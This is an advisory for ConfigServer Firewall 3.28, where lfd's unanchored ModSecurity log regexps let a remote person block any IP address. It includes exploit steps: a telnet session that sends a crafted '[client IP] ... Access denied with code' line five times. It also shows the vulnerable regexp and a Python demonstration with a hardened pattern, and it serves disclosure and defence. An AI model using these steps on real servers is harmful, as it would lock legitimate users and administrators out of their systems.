CSF 3.28 - remotely block any IP address (modsec v1 and modsec v2 regexps)



DESCRIPTION


ConfigServer Firewall 3.28 provides the option to block brute force login attempts on various services by having lfd scan log files with regular expressions. The regexps in csf/regexp.pm for the two ModSecurity log formats (modsec v1 and modsec v2) matched the "[client <ip>] ... Access denied with code" text anywhere in an Apache error log line instead of anchoring on the client field that Apache itself writes at the start of the record. Because Apache copies a rejected request line into that same error log line, any remote, unauthenticated person could inject a fake "[client <ip>]" fragment into the log and have lfd block any IP address of their choice. The code for this looked similar to the following:

    # Unanchored match: the captured [client IP] may come from anywhere in the
    # log line, including text the remote client supplied in its request.
    if ( $log_line =~ /\[client (\d+\.\d+\.\d+\.\d+)\] ModSecurity: Access denied with code/ ) {
        return ( 'mod_sec alert', $1, 'mod_sec');
    }


The following steps can be used to take advantage of this issue. Repeat them 5 times so the count reaches lfd's block threshold:

1. telnet <victim server> 80

2. enter the following, then press Enter twice:
[client 1.2.3.4] ModSecurity: Access denied with code


The regexp for the other ModSecurity log format was exploitable in the same way. In step 2 above, use the following line instead:

[client 1.2.3.4] mod_security: Access denied with code


Once the threshold is reached, lfd calls iptables to block 1.2.3.4, an address that never connected to the server.
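The following is an added example, not code from the advisory or from CSF, that reproduces the flaw described above and in the regexp shown earlier: it runs the vulnerable pattern (translated verbatim from the Perl) over a constructed Apache 2.2 style error log line of the kind the telnet steps produce, shows that the injected address is what gets extracted, and contrasts it with an anchored pattern. The log lines, the addresses, the "Invalid method in request" prefix (Apache's own wording for a rejected request line) and the hardened regexp are all assumptions made for the example; the hardened regexp is not CSF's actual fix.

```python
import re

# Pattern carried over verbatim from the vulnerable csf/regexp.pm snippet.
# It is unanchored: "[client IP]" can match anywhere in the line, including
# inside text that the remote client supplied in its request.
VULNERABLE_RE = re.compile(
    r'\[client (\d+\.\d+\.\d+\.\d+)\] ModSecurity: Access denied with code'
)

# Hardened variant (example only, not CSF's fix): anchor to the start of the
# Apache 2.2 error_log record so only the client field written by Apache can be
# captured, and require the ModSecurity message (with its status code) to
# follow that field directly.
HARDENED_RE = re.compile(
    r'^\[[^\]]+\] \[error\] \[client (\d+\.\d+\.\d+\.\d+)\] '
    r'ModSecurity: Access denied with code \d+'
)

# Constructed sample data (assumed addresses, not from the advisory).
ATTACKER = '198.51.100.7'   # the host that actually connected on port 80
VICTIM = '1.2.3.4'          # the address the attacker wants lfd to block

# Constructed line in Apache 2.2 error_log format: Apache rejects the garbage
# request line and echoes it after its own "Invalid method in request" text.
INJECTED_LINE = (
    f'[Tue Mar 04 10:15:22 2008] [error] [client {ATTACKER}] '
    f'Invalid method in request [client {VICTIM}] ModSecurity: Access denied with code'
)

# Constructed genuine ModSecurity 2.x denial, for comparison.
GENUINE_LINE = (
    f'[Tue Mar 04 10:15:23 2008] [error] [client {ATTACKER}] '
    'ModSecurity: Access denied with code 403 (phase 2). Pattern match "x" at ARGS:q.'
)


def extract_ip(pattern, log_line):
    """Return the IP the given regexp would hand to lfd for this line, or None."""
    m = pattern.search(log_line)
    return m.group(1) if m else None


def simulate_lfd(pattern, log_lines, threshold=5):
    """Count matches per IP the way lfd does and return the set of IPs that
    reach the block threshold (the advisory's five repetitions)."""
    hits = {}
    for line in log_lines:
        ip = extract_ip(pattern, line)
        if ip:
            hits[ip] = hits.get(ip, 0) + 1
    return {ip for ip, n in hits.items() if n >= threshold}


if __name__ == '__main__':
    print('vulnerable regexp on injected line ->', extract_ip(VULNERABLE_RE, INJECTED_LINE))
    print('hardened regexp on injected line   ->', extract_ip(HARDENED_RE, INJECTED_LINE))
    print('hardened regexp on genuine line    ->', extract_ip(HARDENED_RE, GENUINE_LINE))
    print('blocked after 5 injections (vulnerable):', simulate_lfd(VULNERABLE_RE, [INJECTED_LINE] * 5))
    print('blocked after 5 injections (hardened):  ', simulate_lfd(HARDENED_RE, [INJECTED_LINE] * 5))
```

The hardened pattern works because Apache always puts its own text ("Invalid method in request", in this example) between the real client field and anything the attacker typed, so an anchored match cannot reach the injected fragment. The general lesson for any log-driven blocker is the same: match only on fields the logging daemon itself emits, never on free text that a remote party can influence, and re-check the pattern whenever the log format changes (Apache 2.4, for instance, writes "[client IP:port]" and a different prefix, so this exact regexp would need adjusting there).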



IMPACT


Remote, unauthenticated persons could block any IP address of their choice, including the addresses of legitimate users or the server's own administrators, amounting to a remote denial of service against arbitrary addresses.